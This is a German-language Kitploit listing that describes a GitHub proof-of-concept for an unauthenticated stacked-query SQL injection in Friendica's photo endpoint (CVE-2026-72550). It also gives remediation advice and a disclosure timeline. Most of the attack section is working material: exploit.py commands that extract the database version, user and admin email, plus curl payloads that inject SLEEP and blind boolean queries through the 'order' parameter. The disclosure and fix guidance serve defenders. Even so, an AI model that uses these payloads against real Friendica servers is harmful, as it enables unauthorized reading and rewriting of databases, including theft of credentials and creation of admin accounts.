Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-72550-poc — CVE-2026-72550 — Friendica PoC für nicht authentifizierte Stacked-Query-SQL-Injection (CVSS 9.8 Kritisch) | Kitploit
Tools/GitHubGitHub/abdugafforov-bobur/cve-2026-72550-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubabdugafforov-bobur/cve-2026-72550-poc

CVE-2026-72550-poc

CVE-2026-72550 — Friendica PoC für nicht authentifizierte Stacked-Query-SQL-Injection (CVSS 9.8 Kritisch)

Repository anzeigen
6vor 27 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-72550 — Friendica Unauthentifizierte SQL-Injection

Unauthentifizierte SQL-Injection mit gestapelten Abfragen im Foto-Endpunkt von Friendica erlaubt jedem Besucher, beliebiges SQL auszuführen.

FeldWert
CVE-IDCVE-2026-72550
ProduktFriendica (selbst gehostetes föderiertes soziales Netzwerk)
Betroffen<= 2026.08-dev (git HEAD e3fc1bc)
TypCWE-89: SQL-Injection (unauthentifiziert, gestapelte Abfragen)
SchweregradKritisch — CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Authentifizierung erforderlichKeine

Zusammenfassung

Der Foto-View-Endpunkt in Friendica nimmt den Abfrageparameter order und fügt ihn ohne Escape in eine SHOW COLUMNS ... LIKE '...'-Anweisung ein, die über ein direktes PDO::query() ausgeführt wird – was mehrere Anweisungen erlaubt. Es ist keine Anmeldung erforderlich, und bei einer Standardinstallation (block_public ist standardmäßig deaktiviert) reicht jedes öffentlich sichtbare Foto aus. Da PDO::query() gestapelte Anweisungen ausführt, liest ein anonymer Angreifer nicht nur Daten – er führt beliebiges SQL aus, einschließlich INSERT/UPDATE, um einen Administrator-Benutzer zu erstellen.

Verwundbarer Codepfad

root@kitploit:~
mod/photos.php:673              — reads raw $_GET['order']
DBStructure::existsColumn()     — concatenates into: SHOW COLUMNS FROM `photo` LIKE '$column'
  src/Database/DBStructure.php:714
DBA::p() → PDO::query()         — executes with stacked statements enabled

Der Standardanforderungspfad erreicht diesen Code: $cmd hat standardmäßig den Wert 'view' (was die Bedingung $cmd === 'view' erfüllt) und no_count ist deaktiviert, sodass keine Authentifizierung und keine nicht standardmäßige Einstellung erforderlich ist.

Verwendung

root@kitploit:~
# Install dependency
pip install requests

# Check if target is vulnerable (time-based detection)
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --check-only

# Extract database version via blind SQLi
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract version

# Extract current database user
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_user

# Extract current database name
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract db_name

# Extract first admin email
python3 exploit.py -u http://target:8176 -r alice -i a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 --extract admin_email

Parameter

FlagBeschreibung
-u / --urlBasis-URL des Ziels (z. B. http://target:8176)
-r / --userBenutzername, dessen Fotogalerie angegriffen werden soll
-i / --resource-idRessourcen-ID eines beliebigen öffentlich sichtbaren Fotos
--extractWert, der exfiltriert werden soll: version, db_user, db_name, admin_email
--check-onlyNur die Schwachstelle testen, keine Daten extrahieren
--sleepSLEEP-Verzögerung in Sekunden (Standard: 5)

Manuelle Reproduktion

Es sind weder Cookies noch eine Authentifizierung erforderlich. Richten Sie es auf eine beliebige Ressourcen-ID eines öffentlichen Fotos:

root@kitploit:~
# Control — valid order, returns fast (~0.05s)
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=created"

# Injection — stacked SLEEP(5) executes, response held ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20SLEEP(5)--%20-"

Dekodierte Payload: x';SELECT SLEEP(5)-- -

Das injizierte SQL wird zu:

root@kitploit:~
SHOW COLUMNS FROM `photo` LIKE 'x';SELECT SLEEP(5)-- -'

Blinde Boolesche Extraktion

root@kitploit:~
# TRUE condition (@@version starts with '1') → delays ~5s
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%271%27,SLEEP(5),0)--%20-"

# FALSE condition (@@version starts with '9') → returns fast
curl -s -o /dev/null -w "%{time_total}\n" \
  "http://TARGET/photos/alice/image/RESOURCE_ID?order=x%27%3BSELECT%20IF(SUBSTRING(@@version,1,1)=%279%27,SLEEP(5),0)--%20-"

Auswirkungen

Ein nicht authentifizierter Angreifer kann:

  • Lesen beliebiger Daten aus der Datenbank (blinde Extraktion von Anmeldedaten, E-Mails, privaten Nachrichten)
  • Schreiben beliebiger Zeilen – einschließlich der Erstellung eines Administratorkontos per INSERT INTO user
  • Ändern vorhandener Daten – jeden Benutzer zum Administrator hochstufen, Beiträge manipulieren, Passwörter zurücksetzen
  • Löschen von Daten oder Verwerfen von Tabellen (Denial of Service)

Dies ist eine vollständige Kompromittierung der Datenbank, die von jedem anonymen Besucher bei einer Standardinstallation von Friendica erreicht werden kann.

Behebung

  1. order vor der Verwendung gegen die bekannte Spalten-Whitelist validieren
  2. Parametrisierte Abfragen anstelle der Zeichenfolgenverkettung in SHOW COLUMNS verwenden
  3. Die Ausführung mehrerer Anweisungen auf der PDO-Verbindung deaktivieren (PDO::ATTR_EMULATE_PREPARES => false)

Zeitleiste

DatumEreignis
2026-07-07Schwachstelle entdeckt und auf lokaler Instanz bestätigt
2026-08-11CVE-2026-72550 über TuranSec CNA veröffentlicht

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und zu Bildungszwecken bereitgestellt. Verwenden Sie es nur gegen Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Der Autor übernimmt keine Haftung für Missbrauch.

Danksagungen

Entdeckt von Bobur Abdugafforov (@abdugafforov-bobur)

CVE zugewiesen über TuranSec CNA

Tool herunterladen